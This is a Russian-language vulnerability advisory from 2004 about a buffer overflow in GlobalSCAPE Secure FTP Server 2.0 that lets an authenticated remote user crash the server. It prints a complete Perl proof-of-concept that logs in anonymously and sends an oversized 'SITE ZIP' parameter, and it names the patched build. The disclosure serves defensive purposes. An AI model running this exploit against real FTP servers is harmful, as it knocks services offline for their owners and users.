Security Lab

Удаленный отказ в обслуживании против GlobalSCAPE Secure FTP Server

Дата публикации:19.03.2004
Всего просмотров:1250
Опасность:
Средняя
Наличие исправления: Да
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Отказ в обслуживании
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: GlobalSCAPE Secure FTP Server 2.x
Уязвимые версии: GlobalSCAPE Secure FTP Server 2.0 Build 03.11.2004.2

Описание: Переполнение буфера обнаружено в GlobalSCAPE Secure FTP Server. Удаленный авторизованный пользователь может аварийно завершить работу сервера.

Удаленный авторизованный пользователь может послать специально сформированную команду SITE, с параметром ~252 байта, чтобы перезаписать память и аварийно завершить работу сервера.

Пример/Эксплоит:

#!/usr/bin/perl

use IO::Socket;

$host = "192.168.1.243";

$remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, 
PeerPort => "2117");

unless ($remote) { die "cannot connect to ftp daemon on $host" }

print "connected\n";
while (<$remote>)
 
 print $_;
 if (/220 /)
 {
  last;
 }
 

$remote->autoflush(1);

my $ftp = "USER anonymous\r\n";

print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>)
 
 print $_;
 if (/331 /)
 {
  last;
 }
 

$ftp = join("", "PASS ", "a\@b.com", "\r\n");
print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>)
 
 print $_;
 if (/230 /)
 {
  last;
 }
 

$ftp = join ("", "SITE ZIP /d:", "A"x(252), "\r\n");

print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>)
 
 print $_;
 if (/250 Done/)
 {
  last;
 }
 

close $remote;

URL производителя: http://www.cuteftp.com/gsftps/

Решение:Установите обновленную версию программы (2.0 Build 03.16.2004.1)

Ссылки: GlobalSCAPE Secure FTP Server Buffer Overflow (Parameter Handling)